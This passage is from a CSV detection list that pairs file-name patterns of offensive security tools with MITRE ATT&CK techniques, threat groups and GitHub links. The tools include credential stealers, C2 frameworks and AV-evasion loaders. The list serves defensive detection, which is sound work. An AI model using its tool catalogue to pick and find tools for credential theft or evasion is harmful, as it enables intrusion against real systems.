"*\Certify.exe*",".{0,1000}\\Certify\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - 
T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","14476" "*\Certify.exe*",".{0,1000}\\Certify\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Certify","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","14477" "*\Certipy.exe*",".{0,1000}\\Certipy\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","14478" "*\certipy.pfx*",".{0,1000}\\certipy\.pfx.{0,1000}","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145 - T1649","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","10","7","633","66","2024-03-20T10:58:15Z","2023-01-31T15:37:12Z","14479" "*\certipy64.exe*",".{0,1000}\\certipy64\.exe.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","0","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","14480" "*\ChaiLdr.exe*",".{0,1000}\\ChaiLdr\.exe.{0,1000}","offensive_tool_keyword","ChaiLdr","Indirect syscalls AV bypass","T1055.011 - T1569 - T1564 - T1213","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Cipher7/ChaiLdr","1","0","N/A","N/A","9","3","220","35","2024-05-17T13:58:04Z","2024-03-29T09:19:10Z","14481" "*\ChaiLdr-main*",".{0,1000}\\ChaiLdr\-main.{0,1000}","offensive_tool_keyword","ChaiLdr","Indirect syscalls AV bypass","T1055.011 - T1569 - 
T1564 - T1213","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Cipher7/ChaiLdr","1","0","N/A","N/A","9","3","220","35","2024-05-17T13:58:04Z","2024-03-29T09:19:10Z","14482" "*\Chakra.dll*",".{0,1000}\\Chakra\.dll.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","N/A","10","","N/A","","","","14483" "*\changepasswd.py*",".{0,1000}\\changepasswd\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","14484" "*\ChannelLinter.exe*",".{0,1000}\\ChannelLinter\.exe.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. 
Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP - C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","N/A","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","14485" "*\ChannelLinter_d64.exe*",".{0,1000}\\ChannelLinter_d64\.exe.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP - C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","N/A","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","14486" "*\chaos.exe*",".{0,1000}\\chaos\.exe.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","N/A","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","14487" "*\CHAOS-5.0.1.zip*",".{0,1000}\\CHAOS\-5\.0\.1\.zip.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","N/A","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","14488" "*\CHAOS-master.zip*",".{0,1000}\\CHAOS\-master\.zip.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","N/A","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","14489" "*\charlotte.cpp*",".{0,1000}\\charlotte\.cpp.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","N/A","10","10","976","211","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z","14490" "*\charlotte.py*",".{0,1000}\\charlotte\.py.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","N/A","10","10","976","211","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z","14491" "*\Checkerv2.0.exe -outfile * -outformat *",".{0,1000}\\Checkerv2\.0\.exe\s\-outfile\s.{0,1000}\s\-outformat\s.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","14492" "*\CheckPort.exe*",".{0,1000}\\CheckPort\.exe.{0,1000}","offensive_tool_keyword","CheckPort","executables for penetration testing Windows Active Directory 
environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","CheckPort","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","14493" "*\CheckPort.exe*",".{0,1000}\\CheckPort\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","CheckPort","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","14494" "*\checkRoot.ps1*",".{0,1000}\\checkRoot\.ps1.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100 - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","N/A","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","14495" "*\CheckSMBSigning.ps1*",".{0,1000}\\CheckSMBSigning\.ps1.{0,1000}","offensive_tool_keyword","CheckSMBSigning","Checks for SMB signing disabled on all hosts in the network","T1018 - T1550","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Leo4j/CheckSMBSigning","1","0","N/A","N/A","6","1","8","1","2023-10-13T11:55:33Z","2023-05-17T11:47:52Z","14496" "*\Check-VM.ps1*",".{0,1000}\\Check\-VM\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","14497" "*\cheetah.py*",".{0,1000}\\cheetah\.py.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","0","N/A","N/A","10","7","630","150","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z","14498" "*\cheetah-master.zip*",".{0,1000}\\cheetah\-master\.zip.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","0","N/A","N/A","10","7","630","150","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z","14499" "*\chimera.py*",".{0,1000}\\chimera\.py.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","N/A","9","5","469","56","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z","14500" "*\Chimera-main\*",".{0,1000}\\Chimera\-main\\.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","N/A","9","5","469","56","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z","14501" 
"*\chisel.exe*",".{0,1000}\\chisel\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","14502" "*\chisel.exe*",".{0,1000}\\chisel\.exe.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","N/A","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","14503" "*\chisel\client\*",".{0,1000}\\chisel\\client\\.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","N/A","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","14504" "*\chisel\server\*",".{0,1000}\\chisel\\server\\.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","N/A","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","14505" "*\chisel_x32*",".{0,1000}\\chisel_x32.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - 
TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","14506" "*\chisel_x64*",".{0,1000}\\chisel_x64.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","14507" "*\chisel-master*",".{0,1000}\\chisel\-master.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","N/A","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","14508" "*\chntpw.c*",".{0,1000}\\chntpw\.c.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","14509" "*\chntpw-140201*",".{0,1000}\\chntpw\-140201.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","14510" "*\chrome_creditcard.csv*",".{0,1000}\\chrome_creditcard\.csv.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential 
Access","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","14512" "*\chrome_creditcard.json*",".{0,1000}\\chrome_creditcard\.json.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","14513" "*\chrome_decrypt.cpp*",".{0,1000}\\chrome_decrypt\.cpp.{0,1000}","offensive_tool_keyword","Chrome-App-Bound-Encryption-Decryption","Tool to decrypt App-Bound encrypted keys in Chrome using the IElevator COM interface with path validation and encryption protections","T1003 - T1081 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption","1","0","N/A","N/A","9","5","401","73","2025-04-22T08:30:00Z","2024-10-27T11:28:35Z","14514" "*\chrome_decrypt.exe*",".{0,1000}\\chrome_decrypt\.exe.{0,1000}","offensive_tool_keyword","Chrome-App-Bound-Encryption-Decryption","Tool to decrypt App-Bound encrypted keys in Chrome using the IElevator COM interface with path validation and encryption protections","T1003 - T1081 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption","1","0","N/A","N/A","9","5","401","73","2025-04-22T08:30:00Z","2024-10-27T11:28:35Z","14515" "*\Chrome_pass.db*",".{0,1000}\\Chrome_pass\.db.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","N/A","10","10","54","18","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z","14516" 
"*\chrome_password.csv*",".{0,1000}\\chrome_password\.csv.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","14517" "*\chrome_password.json*",".{0,1000}\\chrome_password\.json.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","14518" "*\ChromeDump.ahk*",".{0,1000}\\ChromeDump\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","14520" "*\ChromeKatz.sln*",".{0,1000}\\ChromeKatz\.sln.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","14521" "*\chromepasswordlist.csv*",".{0,1000}\\chromepasswordlist\.csv.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - 
TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","14522" "*\chromepasswords.py*",".{0,1000}\\chromepasswords\.py.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","14523" "*\ChromeStealer.cpp*",".{0,1000}\\ChromeStealer\.cpp.{0,1000}","offensive_tool_keyword","ChromeStealer","extract and decrypt stored passwords from Google Chrome","T1555.003 - T1003.001 - T1552.001","TA0006 ","N/A","N/A","Credential Access","https://github.com/BernKing/ChromeStealer","1","0","N/A","N/A","8","2","145","18","2024-07-25T08:27:10Z","2024-07-14T13:27:30Z","14524" "*\ChromeStealer.sln*",".{0,1000}\\ChromeStealer\.sln.{0,1000}","offensive_tool_keyword","ChromeStealer","extract and decrypt stored passwords from Google Chrome","T1555.003 - T1003.001 - T1552.001","TA0006 ","N/A","N/A","Credential Access","https://github.com/BernKing/ChromeStealer","1","0","N/A","N/A","8","2","145","18","2024-07-25T08:27:10Z","2024-07-14T13:27:30Z","14525" "*\ChromeStealer-main*",".{0,1000}\\ChromeStealer\-main.{0,1000}","offensive_tool_keyword","ChromeStealer","extract and decrypt stored passwords from Google Chrome","T1555.003 - T1003.001 - T1552.001","TA0006 ","N/A","N/A","Credential Access","https://github.com/BernKing/ChromeStealer","1","0","N/A","N/A","8","2","145","18","2024-07-25T08:27:10Z","2024-07-14T13:27:30Z","14526" "*\chromium\getCredschromium.h*",".{0,1000}\\chromium\\getCredschromium\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - 
TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","14527" "*\chromium_based_browsers.py*",".{0,1000}\\chromium_based_browsers\.py.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","N/A","10","5","423","62","2024-07-12T10:30:42Z","2020-09-15T09:23:56Z","14528" "*\ChromiumDecryptor.cpp*",".{0,1000}\\ChromiumDecryptor\.cpp.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","N/A","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","14529" "*\CIMplant.exe*",".{0,1000}\\CIMplant\.exe.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","0","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","14530" "*\cleanRDP.bat*",".{0,1000}\\cleanRDP\.bat.{0,1000}","offensive_tool_keyword","Dispossessor","CleanRDP.bat script erasing RDP traces used by Dispossessor ransomware group","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","14533" 
"*\cleantracks.ps1",".{0,1000}\\cleantracks\.ps1","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14534" "*\CleanTracks.ps1*",".{0,1000}\\CleanTracks\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14535" "*\clear_logs.py*",".{0,1000}\\clear_logs\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - 
T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","14536" "*\ClearnEventRecordID.ps1*",".{0,1000}\\ClearnEventRecordID\.ps1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14537" "*\ClearnIpAddress.ps1*",".{0,1000}\\ClearnIpAddress\.ps1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - 